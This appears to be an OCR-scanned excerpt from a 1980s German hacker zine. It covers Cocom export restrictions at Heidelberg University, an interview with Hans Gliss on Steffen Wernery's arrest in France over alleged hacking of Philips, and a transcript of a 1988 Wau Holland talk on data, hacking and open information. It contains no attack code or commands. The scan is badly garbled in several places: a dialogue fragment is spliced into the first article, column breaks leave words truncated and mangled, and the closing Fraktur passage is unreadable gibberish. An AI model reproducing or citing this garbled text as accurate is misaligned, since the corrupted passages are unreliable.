Hardware-Zusatzes in Erwägung zog. 

Der Pferdefuß dieser Geschichte: Die Vector 
Facility fällt als High-Tech-Gerät unter die Co- 
com-Liste der USA, auf der all diejenigen Waf¬ 
fen und Produkte stehen, die nicht ins sozialisti¬ 
sche Ausland exportiert werden dürfen und so¬ 
mit unter Geheimhaltung stehen. 

Die Konsequenz wäre der Ausschluß von rund 
hundert Studenten aus 17 sozialistischen Län¬ 
dern von der Arbeit am Heidelberger Rechen¬ 
zentrum. Sie sollten auf die Benutzung des 
Rechners per Unterschrift verzichten (im Falle 
des Kaufs des Zusatzgerätes), auch wenn sie 
den Rechner zur Anfertigung von Diplom- und 
Doktorarbeiten benötigten. Vier Monate, bis 
zum Februar '88 dauerte es, bis die studenti¬ 
schen Vertreter in den Universitätsgremien hell¬ 
hörig wurden. Insbesondere Bernd Fix (studen¬ 
tischer Vertreter im universitären EDV-Aus- 
schuß) sorgte dann für die notwendige Öffent¬ 
lichkeit. 


p; ’Ne Zeiteinheit. Wau hat ’ne subjektive Zei¬ 
teinheit für sich erfunden. 

w: Nö, ’ne objektive. 

p: Das behauptest DU. 

w: Ja, das behaupte ich. 

p: Meinste, das Tickern ist bei allen Menschen 
genau gleich lang? 

w: Es liegt in dieser Größenordnung. 

p: Und das, sagst du, ist ab jetzt eine Szene? 
Ist aber ’n bißchen knapp. Das ist ein Augen¬ 
blick, keine Szene. 

w: Ist ein Augenblick, gut. 


Abgesehen von der verfassungswidrige 
nachteiligung einer bestimmten studenti^ 
Gruppe wirkte auch die Anwendung 
com-Bestimmungen im Heidelberger Fall 
dezu grotesk. Denn eine Maschinenspion^'"®' 
kann alleine durch die Benutzung des n 
ners nicht betrieben werden - Schaltpr-^^' 
spuckt der Rechner nicht aus. So das gie^'jf 
stimmende Urteil von Bernd Fix und Dr p', ‘ 
Sandner, dem Leiter des Rechenzentrum 
Trotz dieser Argumente bestehen die Cocn ^ 

Bestimmungen, so daß die US-Ausfuhrbehö rt ' 

auch im Heidelberger Fall auf die Einhalty 
der Regelungen pochte. Die Universität befa'^H 
sich nun in einer unangenehmen Situation 2 
sie bei einem Kauf der Vector Facility mit 
gehenden Protesten der Studentenschaft ? 
rechnen hatte. Die fast schon sichere Anschaf^ 
fung wurde überdacht, einige Professoren be 
kündeten ihre Vorbehalte, und flugs wurpg ■' 
den Universitätsgremien die Anschaffung 
Vector Facility (vorläufig) aufs „Eis“ gelegt) 

Auf Anfrage des AStA Heidelberg bestätigte ct^r 
Rektor der Universität Heidelberg, Prof, Dr. 
iin, daß „eine Entscheidung über den Kauf einer 
V, F, am Universitätsrechenzentrum jedenfang 
im Haushaltsjahr 1988 nicht mehr ansteht") 

Es bleibt abzuwarten, ob dies schon das Ende 
der Heidelberger Computer-Posse ist oder 
nicht vielmehr der Anfang von langwieriggp| 
Querelen zwischen Universität und Studenten 
DARIUS-OLIVER KIAN^^q 




Was ist im Falt Wernery wirklich passiert? 


Hacker in Haft: 

»Die Zeit des 
Indkinerspieis 
ist zu Ende!« 

Ironie der Ereignisse: Steffen Wernery wollte in Frankreich 
auf einem Fachkongreß über Datenschutz referieren 
-und wurde als Hacker verhaftet. Wir sprachen mit Hans 
Gliss, der die aktuellen Ereignisse hautnah miterlebte. 


PMC; Herr Gliss, Sie sind in Frankreich 
zusammen mit Steffen Wernery verhaf¬ 
tet worden. Weshalb? 

Gliss: Man zeigte mir einen Arretie¬ 
rungsbeschluß und führte mich ab - 
zum Verhör. Nach französischem Recht 
ist es möglich, daß ein Zeuge zum 
Zweck des Verhörs arretiert wird, bis zu 
24 Stunden. Sieht der Richter ein Infor¬ 
mationsbedürfnis, kann das auf 48 Stun¬ 
den verlängert werden, Spätestens 
dann muß der Betroffene freigelassen 
oder unter Anklage gestellt werden. 
PMC: Sie wurden nach vier Stunden 
freigelassen, im Gegensatz zu Werndry. 
Gliss: Vorzuwerfen hatte ich mir eh 
nichts. Ich habe auf meine Verbindun¬ 
gen zu bestimmten Sicherheitsbehör¬ 
den hingewiesen, dort könne man sich 
erkundigen. Das haben sie offensicht¬ 
lich getan. Und jemand wie ich aus die¬ 
sem Umfeld wirkt offensichtlich vertrau¬ 
ter als Wernery, der erwiesenermaßen 
direkten Kontakt zur Hackerszene hat. 
PMC: Wäs wurde Wernery vorgewor¬ 
fen? 

Gliss: Er wurde in Untersuchungshaft 
genommen, weil er tatverdächtig sei, 
Daten ausspioniert, verfälscht und zer¬ 
stört zu haben, und zwar in zehn Fallen in 
Frankreich. 

PMC: Der spektakulärste Fall hiervon 
ist ja beim französischen Philips-Kon¬ 
zern passiert. 

Gliss: Die haben die Verhaftung be¬ 
wirkt. 

PMC: Was ist denn nun wirklich dran an 
den Vorwürfen? 

Gliss: Ich halle das Vorgehen von Phi¬ 
lips für dumm und infam. Mir hat die Po¬ 
lizei gesagt, man würde Wernery dabe¬ 
halten, weil man nun jemanden ausquet¬ 
schen könne, von dem man wisse, daß 
er viel weiß, ln Deutschland wäre das 
rechtlich nicht möglich. 

PMC; Was ist denn bei Philips an Scha¬ 
den entstanden? 

Gliss: Es gibt da die wüstesten Behaup¬ 
tungen. Über Schäden in Höhe von vier 
Milliarden Francs* wird spekuliert; daß 
Daten zerstört worden seien; daß For¬ 
schungsprojekte ausgespäht wurden; 
und daß auf militärisch wichtige Daten 
zugegriffen worden sei. Ich mag mich 
an diesen Spekulationen nicht beteili¬ 
gen, ich berichte hier nur, was in der Pa¬ 
riser Gerüchteküche umlief. Ob sich der 
Schaden wirklich beziffern läßt, ob das 
jemals genau geklärt wird, ist eine an¬ 
dere Frage. 

PMC: Weshalb hat Wernery das Risiko 
auf sich genommen, nach Frankreich zu 
fahren? 

Gliss: Er sollte als Referent auf dem SE- 
CURICOM-Kongreß auftreten und dort 
über die Vorfälle im NASA-Netz berich¬ 
ten. Wir haben uns ja schon lange vorher 
erkundigt, ob für ihn Gefahr bei der Ein¬ 
reise besteht, ob etwas gegen ihn vor¬ 
liegt - das wurde dem Veranstalter ge- 


■Rund 1,3 Milliarden Mark, 


genüber verneint. Aber Wernbry hat ei¬ 
nen großen Fehler gemacht. Er hat der 
Firma Philips einen Brief geschickt, mit 
einem Hinweis auf seinen Auftritt zum 
Thema NASA-Hack, und daß es nützlich 
wäre, sich zu einem vertraulichen Ge¬ 
spräch zu treffen. Denn er kenne die 
Umstände der Philips-Vorfälle über¬ 
haupt nicht. 

PMC: Und was meinte Philips dazu? 
Gliss: Es wurde ein Termin vereinbart, 
aber am Flugzeug erschien ein Emp¬ 
fangskomitee der Polizei. 

PMC; Mit welcher Begründung? 

Gliss: Der Untersuchungsrichter sagte 
Wernerys Anwältin, man habe ihm zwar 
nichts Konkretes nachweisen können, 
man wolle ihn aber dabehalten, um 
durch weitere Recherchen eine Mitwis¬ 
serschaft nachzuweisen. Außerdem 
wurde der Brief an Philips als Erpres¬ 
sungsversuch gewertet, und das sei ein 
hinreichender Haftgrund. 

PMC: Aber wirkliche Hinweise auf straf¬ 
bare Handlungen gibt es nicht? 

Gliss; Nein. 

PMC: Wirklich überhaupt nichts? 

Gliss: Ich weiß wirklich nichts davon. 
Und meine Einschätzung von Wernery 
ist; Hätte er sich nur das Geringste vor¬ 
zuwerfen gehabt, dann wäre er sicher 
nicht nach Frankreich gefahren. Er ist ja 
nicht dumm. 

PMC: Nun hatte es ja schon zuvor in 
Deutschland Ärger gegeben. Haus¬ 
durchsuchung beim Chaos Computer 
Club und auch in Wernerys Wohnung. 
Gliss: Selbst die deutschen Behörden 
waren von der Aktion der Franzosen völ¬ 


lig überrascht. Die Staatsanwaltschaft 
Hamburg hat selbst eine Art Ehrenerklä¬ 
rung für ihn abgegeben. Deren Ermitt¬ 
lungen haben ergeben, daß er weder 
Tater noch Mittäter in dieser Angele¬ 
genheit ist. 

PMC: ln der Öffentlichkeit hält sich 
aber immer noch die Ansicht, der 
NASA-Hack ginge auf das Konto der 
Hamburger Computer-Chaoten. 

Gliss: Diese Ansicht ist falsch. Die 
NASA-Hacker haben beim Chaos Com¬ 
puter Club Beweismaterial abgeliefert. 
Dieses Material ist auf ausdrücklichen 
Wunsch eines deutschen Sicherheits¬ 
dienstes gesammelt worden. Der hat Ko¬ 
pien davon bekommen und dafür ge¬ 
sorgt, daß die Amerikaner, vor allem die 
NASA und DEC als verantv/ortlicher 
Hersteller, informiert wurden. Ich bin 
damals Zeuge dieser Verhandlungen 
gewesen. Nach sechsmonatigen Ermitt¬ 
lungen wurde am 16. März Wernerys An¬ 
walt mitgeteilt, Wernbry sei nicht tatver¬ 
dächtig. Vor allem was die französischen 
Vorwürfe angehe, die ja nichts mit dem 
NASA-Netz zu tun haben, gebe es keine 
Anhaltspunkte. Philips und NASA sind 
verschiedene Vorfälle. In den Augen 
der Staatsanwaltschaft, so hieß es, gelte 
Wernery als eine Art Informationsdreh¬ 
scheibe. 

PMC: Hat sich Wernery die fatale Situa¬ 
tion nicht selbst zuzuschreiben, weil er 
nie klare Grenzen zwischen Hacker und 
Berichterstatter gezogen hat? 

Gliss; Aus meinen Gesprächen mit ihm 
weiß ich, daß er die Grenzen sehr klar 
sieht. Der Unterschied ist, ob man in of- 





fene Rechner eindringt oder Daten aus¬ 
späht. Wenn der Chaos Computer Club 
diese Grenze nicht scharf sieht, dann 
darf er sich nicht wundern, wenn sein 
Bild in der Öffentlichkeit immer wieder 
in der Nähe krimineller Machenschaf¬ 
ten angesiedelt wird. 

PMC: Auch in offenen Netzen ist das 
Äusspähen strafbar... 

Gliss: Richtig, nach Paragraph 202a 
Strafgesetzbuch. Nur gibt es eine Reihe 
von Netzen, in denen keine geheimen 
Daten drinstehen. Die NASA hat ja 
selbst nach dem Hack im Netz gesagt, 
das sei keine Sicherheitsbedrohung ge¬ 
wesen. Die Daten seien vergleichbar 
mit öffentlichen Bibliotheken mit freiem 
Zugriff für alle Wissenschaftler. Was ich 
übrigens für eine dumme Aussage der 
NASA halte. Denn zwischen dem Lesen 
frei zugänglicher Daten im Netz und der 
Veränderung des Betriebssystems lie- I 
gen Welten. Im NASA-Computer gelang 
den Hackern, wie bekannt, eine tiefgrei¬ 
fende Änderung des Betriebssystems 
durch die berühmt gewordenen »troja¬ 
nischen Pferde«. 

PMC: Die Hackerszene geriet durch 
den Vorfall in Aufruhr. Es hat sogar Dro¬ 
hungen gegeben, daß man jetzt mal 
wirklich ernst machen wolle. 

Gliss; Ich habe durch einige Kontakte 
erfahren, daß das wohl keine leeren 
Drohungen sind. Das wäre aber wohl 
das Schlimmste, was man Wernery in 
seiner Situation antun könnte. Das hieße 
doch, aha, jetzt schlagen die Komplizen 

zu. „ , 

PMC: Bei den betroffenen Rechnein 
handelt es sich fast ausschließlich um 
VAX-Rechner der Firma DEC. Ist durch 
die Vorfälle nicht jetzt die VAX zum er¬ 
klärten Gegner geworden, an der die 
Hacker ihre Wut auslassen, egal, wer sie 

betreibt? , .nu- 

Gliss: Mit dieser ganzen Aktion hat Phi¬ 
lips der Firma DEC sicherlich einen Bä¬ 
rendienst erwiesen. Das Problem ist 
doch folgendes: Wenn ein Betreiber 
seine Anlage nicht schützt, dann ver¬ 
sucht er, wenn er blamiert ist, die Schuld 
dem Hersteller zuzuschieben. Es gibt ln 
stallationen, wo Hacker versucht haben, 
reinzukommen, aber von den Systemen 
prompt abgewiesen wurden - weil die 
Systeme sicher organisiert sind, 

PMC: Die Schuld liegt Ihrer Meinung 
nach also bei den Betreibern der Änla- 

gen. , . 

Gliss: Ein Vergleich: Wenn Sie beim Au¬ 
tofahren zu faul sind, den Blinker zu be¬ 
nutzen, und dann passiert was, dann 
sind sie nach landläufiger Auffassung 
auch schuld. Bei Computern ist es üb¬ 
lich, daß die Betreiber den Spieß um¬ 
drehen. Entweder ist der Hersteller 
schuld oder der Idiot, der mir reingefah¬ 
ren ist. Und die Zeugen, die da rumste¬ 
hen, sind auch noch schuld, weil sie dar¬ 
über geredet haben. 

PMC: Damit meinen Sie den Berichter¬ 
statter Wernery. 


Gliss: Im vorliegenden Fall betreibt da 
jemand einen Rechner, in dem sich be¬ 
liebig die Hacker tummeln können, und 
sucht dann nach Schuldigen. 

PMC: Ist es denn so schwierig, einen 
Rechner vor unerwünschten Eindring¬ 
lingen zu schützen? 

Gliss: Natürlich nicht, bei Polizei und 
Militär in Deutschland sind die Rechner 
wasserdicht, und auch bei zahlreichen 
Industriebetrieben. 

PMC; Wie viele Rechner, die an den 
Netzen hängen, schätzen Sie denn 



i.'Hansj.G!iss^;ist;,.OhefI:edaWeul^’d 
jFjachzetechrift^^'i »Datenscliiito-Befa-.L 
'' 'iter«. Er lud Wemöjy aIs,JRefereffi !, 



...Steffen,: Wer^ 

s^glieä-'des.lChaös-'ComputerACIu^^^^^ 

i^'Er.'"'MP:der'.:Hackerei.?b^^^ 


durch Versäumnisse der Betreiber als 
schlecht gesichert ein? 

Gliss: Das weiß ich nicht. Aber der 
NASA-Hack brachte ja zutage, daß 
selbst einige renommierte Forschungs¬ 
institute mit geklauter Software arbei¬ 
ten. Die haben sich einen gebrauchten. 
Rechner beschafft und das Betriebssy¬ 
stem vom Kollegen draufgespielt. Die 
waren nie in der Kartei des Herstellers. 
Das wirft ein Licht auf die Sorgfalt, die 
hier waltet. Daß es hier Probleme mit 
der Sicherheit gibt, wundert mich nicht. 
Aber die Leute sollen dann bitte nicht 
auf die Hacker schimpfen. 

PMC: Wie einfach kommt man denn in 
einen schlecht gesicherten VÄX-Rech- 
ner rein? Schaßt das jeder oder nur ein 
Spezialist? 

Gliss: Ich dachte bis vor kurzem, daß 
man dazu wesentliche Erfahrungen mit 



VAXen braucht. Wie ich jetzt weiß, ge¬ 
nügt offenbar die Kenntnis umfangrei¬ 
cher Systembroschüren und eine ge¬ 
wisse Begabung, ln einer Münchner 
Mailbox wurde ein Dokument gefunden, 
das genau beschreibt, wie man angeb¬ 
lich in schlecht gesicherte VAXen übers 
Telefon reinkommt. Das ist nicht der nor¬ 
male Weg, aber nach Ansicht von Si¬ 
cherheitsexperten dürfte es funktioniert 
haben. Der Autor hat das nach eigenem 
Bekunden aus frei erhältlichen System¬ 
broschüren extrahiert und bereits vor 
über zwei Jahren in jener Mailbox veröf¬ 
fentlicht. Das wurde nach der Entdek- 
kung vor einem halben Jahr natürlich ge- 
löscht. 

PMC: Was werden die Hacker jetzt 
nach Ihrer Meinung konkret unterneh¬ 
men? 

Gliss; Ich hoffe, daß sie ihre eigene Posi¬ 
tion überdenken und sich auf Gebieten 
austoben, , auf denen sie nicht straffällig 
werden können. Da gibt es wahnsinnig 
große Betätigungsfelder wie Virenpro- 
gramme, Systemoptimierung. Die da auf 
ihren Hacker-Status stolz sind, die sollen 
bitte mal erwachsen werden. Der Pali 
Wernery beweist, daß das Indianerspiat 
zu Ende ist. 

PMC: Und was rät der Sicherheitsex¬ 
perte Gliss den Betreibern von Anla¬ 
gen? 

Gliss: Die sollten sich in vielen Fällen 
erst einmal Asche aufs Haupt streuen 
und eine Sicherheitsanalyse machen 
Und bevor sie auf Hacker und Hersteller 
schimpfen, sollten sie Ihre individuell« 
Risikolage prüfen und nachsehen, wa «5 
der Hersteller zur Verminderung a'nbie 
tet. Und notfalls noch einiges draufsf^' 
zen. Weshalb installieren DV-BetreiK^^' 
mit sensiblen Anwendungen nicht 
Rückrufautomaük, wenn sie die 
ner schon ans Netz hängen? 

PMC: Die VAXen gelten als sehr siche 
sofern sie korrekt installiert sind. 
steht's da bei anderen Systemen? 

Gliss: Man muß hier unterscheideri 
Wenn das System nicht an einem Nej, 
hängt, völlig abgeschottet ist, dann muß 
man sich nur um die internen Benutz^j. 
kümmern. Das ist einfacher. Aber Wenn 
Leute von außen Zugriff haben, dann hm 
es keinen Sinn, einen Selbstbedienungg, 
laden ans Telefon zu hängen. Beim Be¬ 
triebssystem UNIX etwa gibt es hier 
einige Befürchtungen. 

PMC: UNIX unsicher? Wer behauptet 
das? 

Gliss: Unter Informatikern ist derzeit 
eine Diskussion im Gange, welche Si¬ 
cherheitseigenschaften man von UNIX 
in der Standardversion überhaupt er¬ 
warten kann. Und es gibt Stimmen, wo¬ 
nach innerhalb von UNIX einfach zuviel 
erlaubt ist, um absolut sichere Kontrolle 
zu bekommen. Da muß man auf Ergeb¬ 
nisse dieser Diskussion warten. Es exi¬ 
stiert schon eine sichere Version vop 
UNIX, die soll aber mit der Ausgangs¬ 
version nur wenig zu tun haben, 54“ 

aus: p.m. Magazin 



I 


i 


i 

il 

1 

I 

I 

I 


1 

I 


1 


I 


I 


I 


i 


I 





Aus dem Medienarchiv der Datenschleuder. Korrigierte Abschrift 
eines Vortrage beim Forum Jugend und Technik ( 16 .- 17 . April I988) 
in Bonn, Erich-Ollenhauer-Haus. 

Organisiert von den Jusos in der SPD 

Sonntag, 17 - April I988 9:30 

DATEN -- AUFZUCHT UND PFLEGE 

(Wau Holland) 

Ich habe das Motto "Daten — Aufzucht und Pflege" und möchte anfangen mit 
einem Zitat aus Rolling Stone, November 1987. Da schildert einer so eine 
Rundfahrt durch Deutschland mit dem Auto, wo er den Eindruck hat, daß schon 
die Blätter, die von Bäumen fallen, gucken, als würden sie zuviel Freiheit 
haben. Und die Landschaft schildert er als eine einförmige Landschaft mit 
lauter gleichgeschalteten Leuten, die aussehen, als seien es nur Roboter. 

Die in die Landschaft reingestellt sind, um das ganze .so ein bißchen 
scheinbar zu beleben. 

Das ist eine negative Zukunftssicht von der Entwicklung: 
daß die Computex immer flexibler werden 
und die Menschen immer roboterhaftem. 

Mit ein Grund dafür, weshalb der Chaos Computer Club eben CHAOS Computer 
Club heißt. Weil es unser Ansatz ist, da etwas schöpferisches 
dagegenzusetzen, was nicht diesen aufgeprägten, festen, hierarchischen 
Strukturen entspricht. In der Art und Weise hat sich dieser Club seit der 
Gründung I98I entwickelt und eine Menge von Aktionen gemacht. Wir haben uns 
bemüht, den verschiedensten Seiten gerecht zu werden und haben eine Sache 
gemacht, die unter Journalisten allgemein absolut umstritten ist. 

Wir haben uns, bevor die Geschichte mit dem NASA-Hack öffentlich wurde, an 
das Bundesamt für Verfassungschutz gewandt, weil die ganze Geschichte zu 
heiß war, und weil es uns angenehmer war, daß unsere lieben amerikanischen 
Freunde und Besetzer den NASA-Hack nicht aus den Medien erfahren. Wir haben 
die merkwürdige Erfahrung gemacht, daß die Leute von DEC-Deutschland das 
erst geglaubt haben, als es im Fernsehen gekommen ist. Und NICHT die 
Vorabinformation durch uns. 

Das ist schon ein ziemlich starkes Stück. 

Wir haben des weiteren dabei erfahren, daß eine Reihe von 
Großforschungsunternehmen hier Raubkopien - wie es so heißt - von 
Betriebssystemsoftware gefahren haben. 

An der Stelle stellten wir fest, daß wir dadurch, daß wir uns bemüht haben, 
von den Hackern, die wir nicht kennen, die Rechnerliste zu kriegen und die 
Rechnerliste dann an den Hersteller weitergeleitet wurde, daß wir da schon 
wieder, also naja so datenschutzrechtlich in eine Grauzone vorgestoßen 
sind. 

Und in diesem ganzen Zusammenhang, an dem Steffen eben auch journalistisch 
mit mir beteiligt war — also wir beide haben eigentlich die Entscheidung 
getroffen, uns da eben auch ans Innenministerium zu wenden — haben die 
Franzosen etwas anders reagiert und ihn bei der Einreise zu einer 
Sicherheitsfachtagung, zu der er als Eröffnungsredner geladen war, in 
Frankreich verhaftet. 

Er sitzt dort jetzt seit vier* Wochen. Das ganze kostet alles auch eine 
Menge Geld. Wir können da um Spenden bitten. 




jwijuso.txt 880519 


Und um das jetzt nicht einfach so in den Raum zu stellen; Das, was wir 
mit Steffen zusammen - an praktischem Know How erarbeitet haben, an 

Computer und politischen Einsatz davon, das war ein halbes Jahr Arbeit, 

hier in Bonn, in diesem grauen Hochhaus Tulpenfeld, was die Politik so 

schlecht macht, weil dieses grau einfach Leben tötet und ungeheuer viel 
Kraft aussaugt. Da haben wir eine Studie gemacht, über Computerisierung im 
Bundestag ("Trau keinem Computer, den du nicht (er-)tragen kannst." Der 
Grüne Zweig 117, ISBN 3“9258-117“^)• Und jetzt, wo es, na, bald zwei Jahre 
her ist, wird die so langsam verstanden - um es mal etwas böse zu 

formulieren. Das Ding kostet 7 Mark 50 , da oben sind noch 100 Stück und 
wenn eineR noch eine Spende dazugibt, dann nimmt siEr zum einen was von der 
Veranstaltung mit - was inhaltliches - und zum anderen hilft das auch. 


Daten und Informationen - was ist das eigentlich? 

Ein Beispiel dafür: Bei einer Bank waren am Bargeldautomaten des Nachts 
viele unregelmäßige Abhebungen. Und die Bank wußte überhaupt nicht, warum. 
Sie hat erstraal versucht, durch Listenabgleich rauszukriegen, ob da 
irgendwelche Kunden irgendwie besonders auffällig waren oder irgendwelche 
Konten besonders belastet. Aber das ergab alles nichts. Das war nicht 
schlüssig. 

Dann haben die einen Privatdetektiv eingeschaltet und der Privatdetektiv 
hat binnen kürzester Zeit festgestellt, daß das alles gar nichts besonderes 
war, weil der Bargeldautomat verkehrsgünstig gelegen war zum nächsten 
Straßenstrich. 

So entstehen Daten quasi aus dem Nichts. 

Auf einmal hatte die Bank eine Liste ihrer Bankkunden... (großes oeiächver) 

Diese Entstehung von einer auf einmal brisanten Datei ist etwas ziemlich 
typisches, das passiert oft in vielen Fällen. 

Wer in der politischen Arbeit so auf dieser unteren Funktionärs- und 
Kärrnerebene wirkelt, weiß, welche Kraft es ist, jeden Scheiß, der 
irgendwie kommt, zu archivieren, aufzuschreiben und irgendwann dann in die 
jeweiligen Kisten -- bis in die Schmutzkiste — da rein zu machen, um das 
irgendwann mal zu verwenden. 

Auf einer großen Veranstaltung sagte einer von Coca-Cola über die 
Geschichte des Unternehmens; Am Anfang haben sie jahrelang nur Daten 
gesammelt, gesammelt, gesammelt. Und irgendwann war es soweit: dann wurden 
aus den Daten Informationen. Das ist eine quasi kontinuierliche 
Entwicklung, die aber irgendwann umkippt. Da waren es auf einmal 
Informationen über Marktentwicklung, über Produktplanung und und und, und 
wurden entsprechend eingesetzt. 

Was wir hier in der BRD an Daten zur Verfügung haben, ist außerordentlich 
wenig. Der Punkt der Aufzucht und Pflege von Daten ist in den allerersten 
Keimen verhaftet. Auf der einen Seite wird den Kids von Politik und 
Industrie in die Köpfe geklopft: Wenn ihr nicht brav Computer lernt, gehört 
ihr zum sozialen Schrott, weil ihr mit der Zukunft nicht klarkommt. Wenn 
dieselben Kid's rangehen, und versuchen, sich das Wissen der Welt, was in 
den Datenbanken der Welt lagert, zu greifen, kriegen sie auf die Finger 
geklopft, bzw. an der Stelle wollen die Franzosen an Steffen — das ist 
unser Eindruck — ein abschreckendes Beispiel praktizieren. 



jWljUSO.txt 880519 


In Amerika ist die 
recycelten Hacker . 
Exis tenz grundlage 
fertig sind, gibt 
hat, diese Leute 
Arbeitsverhältnis, 


Situation noch etwas härter. Da gibt es den Begriff der 
Die Leute werden gekrallt, eingesperrt, ihnen wird die 
entzogen. Und wenn sie dann finanziell und persönlich 
es in den USA eine Firma, die sich darauf spezialisiert 
aus dem Knast "frei"zukaufen. Die kommen dann in ein 
wo sie mit dem absoluten Zwie-Denk konfrontiert werden. 


Das ist eine negative Utopie. Diese negative Utopie w,ollen wir verhindern - 
auch wenn es bislang nicht gelungen ist, in die Datenschutzgesetze die 
Straffreiheit bei Selbstanzeige reinzubringen, so wie es im Steuerrecht 
möglich gewesen ist. 


Hacken: was es sonst noch an Gesichtspunkten gibt. 

Die Hackev sind ein gesellschaftliches und politisches Potential, weil sie 
als Bevölkevungsminderheit über die ständig wachsende Datenmaschinerie 
lachen können. Der Steffen hat mal formuliert: Bei den Hackern ist es so, 
da sitzt die Intelligenz nicht hinter dem Bildschirm, sondern vor der 
Tastatur. In diesem Sinn ist auch eine Rede und eine Redevorbereitung, wenn 
sie durch Computerunterstützung vorgenommen wird — wie es Guggemos 
formulierte, daß er seinen Vortrag nicht ohne Computerunterstützung hätte 
halten können -- problematisch. Denn das läßt darauf schließen, daß er eine 
Textbausteinbank verwendet. Und wenn man das konsequent weiterdenkt, könnte 
man den Juso-Bundesvorsitzenden durch ein Expertensystem 

Dii Verwendung^von"Compu'terfi'’¥ur* die Öffentlichkeit, für die Öffnung, das 
was wir als Hacker und Hacksen fordern, offene Netze, die freie Weitergabe 
von Information, den freien Fluß von Informationen, hat zu unserer 
Überraschung starke Unterstützung von der CSU gekriegt. 

In den Veröffentlichungen des Bundesinnenministeriums steht drin: 

Datenschutzgesetze müssen durch Datenöffnungsgesetze ergänzt werden. Erste 

Lesung des Bundesar chiv gesetzes im Deutschen Bundestag. (F.5Lcksimiie BiMiPubUk.j 
Wehn man sich die ganzen Sachen, die dalTincer stecken, haher anguckt, dann 

ist des Pudels Kern, daß die Daten der Bürgerinnen und Bürger dem Staat 
zugänglich gemacht werden sollen. ZAG: Lauschangriffe des Staates auf die 
eigene Wohnung sollen gesetzlich sanktioniert werden. 

Und auf der anderen Seite sollen in den Archiven die Namen geschwärzt 
werden, damit die ganzen Geschichten a la Waldheim oder bezogen auf die 
Verwandtschaft von Franz Josef Strauß und ähnliches, auch nach 40 Jahren 
Lagerfrist irgendwie nicht rauskommen. Weil: die Leute leben ja noch, und 
deren Persönlichkeit muß geschützt werden. 

Das ist die politische Realität hier. 

Und dem etwas entgegenzusetzen durch eine wirkliche Datenöffnung, durch 
Datenbanken, die das, was an Wissen existiert, zur Verfügung stellen , ist 
eine verdammt schwierige politische Aufgabe. Für alle Parteien. Da geht es 
der SPD im Verhältnis genauso schlecht wie den Grünen. Die haben beide 
gewisse entwickelte interne Hierarchien. 

Freigabe von Information kippt Hierarchien. 

Wenn ich gut 500 Jahx'e zurückdenke, zu Zeiten Gutenbergs, der hat den 
Buchdruck erfunden. Und vorher war jeder schreibende Mönch Herr über 
Produktionsmittel: er schrieb die Bibel ab. Der Inhalt war vorgegeben. Die 
Klöster waren enzyklikengesteuerte Fabriken mit karger bis üppiger 
Ausstattung. Wächter waren nur bedingt notwendig, man schlug sich selbst 
und die Gläubigen gingen freiwillig zur Datenabgabe, zur Beichte. 


jwijuso.txt 880519 


Dann kam Gutenberg und erfand den Buchdruck. Plötzlich konnten -- trotz der 
Konzernsprache Latein -- viel mehr Menschen Wissen erlangen. Und wenn es 
"nur" die Bibel war. Es dauerte 50 Jahre, bis Luther sein Thesen-Flugblatt 
medienmäßig effektiv benutzen konnte. Etwa 200 Jahre nach Gutenberg begann 
Diderot und d’Alembert in Frankreich mit der Herausgabe einer 35bändigen 
Enzyklopädie. Dagegen gaben die Päpste Enzykliken heraus — Rundschreiben 
über aktuelle Glaubens- und Sittenprobleme. Die Enzyklopädisten dagegen 
erstellten eine umfassende Darstellung des Wissens der Zeit in 
systematischer Anordnung; eine hervorragend illustrierte Beschreibung der 
damals modernsten Produktionsmittel. 


Ganz vorn, am Anfang, ist natürlich auch beschrieben, wie man druckt, wie 

man sich eine Druckmaschine baut und das ganze macht, („nd ^ ^ 

Dieses Werk störte die Kreise des Papstes und er verbot es. Das Verbot half 

dem Papst, Zeit zu schinden. Haltbar, also praktisch durchsetzbar, war 
damals das Verbot nur kurze Zeit. 


Der Chaos Computer Club ist intern ähnlich strukturiert wie meinetwegen 
eine Universität. Da gibt es den Bereich der Forschung und da gibt es den 
Bereich der Lehre. Das heißt, wir bemühen uns, wieder rauszulassen, was an 
an Wissen irgendwie ansammelt wurde. Wir bemühen uns, diese Zeitspannen 
dazwischen verhältnismäßig kurz zu machen. Wir erkennen gewisse 
gesellschaftliche Strukturen an. Von daher gibt es meinetwegen eine 
Vorabinformation an den Verfassungsschutz. 

Aber bei dieser Entwicklung von der Datenmaschinerie von vor 5 OO Jahren zu 
heute werden die Mittel, das Wissen zu sammeln und weiterzugeben, deutlich 
gebremst. CD-Roms etwa ... da gibt es gigantische Copyrightprobleme. Also 
was mich persönlich interessiert, weil ich mit Sprache zu tun hab, Wahrig's 
großes etymologisches deutsches Wörterbuch ist auf CD-Rom vorhanden. Aber: 
es ist nicht erhältlich, weil der Verlag es nicht freigibt. 

In dem Moment, wo so ein Werk über die Sprache frei ist, kann der Verlag 
ouasi keine Folgegeschäfte mehr machen. Das ist deren Befürchtung. Und in 
ähnlicher Art und Weise ist es mit einer Reihe von anderem Wissen, was 

zurückgehalten wird. 

ist. sind öffentlich zugängliche Datenbanken; ähnlich wie es 
^ff^y,tlTnhe Bibliot heken gibt, wo man an das Zeug, was offenes Wissen ist_ . 
was das Wissen dev Zeit ist, eben ran kann. 

In unserem Rangehen als Hacker und Häxen an die Sache ist es an einigen 
Punkten so, daß -- also ich such' jetzt mal Throbbing Gristle; Genesis P. 
Orridge von der Musikgruppe Throbbing Gristle formulierte das I 979 : ^ 
Information wird ge.s chützt. wie das Geld auf einer Bank. Manche haben .sehr 
Havnn. andere nur sehr wenig. Es wird scharf bewacht , dieses Kapital T 
U nser Job ist es, diese Bank zu knacken und all das zu holen, was uns 
zusteht. Ohne Rücksicht auf Verluste. 

In diesem Sinn ist es auch so, daß jetzt die Briefe, die Steffen 
geschrieben hat, zeigen, daß er einen ganz klaren Kopf hat. 

Wir haben uns seit in Kraft treten der Computergesetze und bereits schon 
vorher durch Veröffentlichungen in der Datenschleuder damit 
auseinandergesetzt, wie wir damit umgehen, daß da jetzt Gesetze kommen, die 
uns eine bestimmte Art zu arbeiten unmöglich machen, bzw. in Untergrund, 
Kriminalität und sonst was drängen. 

Und unsere Reaktion war darauf, zu gucken, was wollen wir eigentlich, was 
ist unser Interesse. 




Stummcinstellungr von Rundfunkgeräten 


'$o(le I9I: Sic ©on&erfdjflit „2f c r n | c f) c n “ ber Scui* 
|d)tn 9\cid)5pojt löfet bic gcmaltigctt Uortfdjritfc «rkcmicii, 
bic bic bcutid)c £fetiifcf)tcd)niti im Icyteii 3al)Te trjielt t)at. 
Sic Dödig neunrtigen Silbfänger (Silbaufnal)mcgcrüic), 
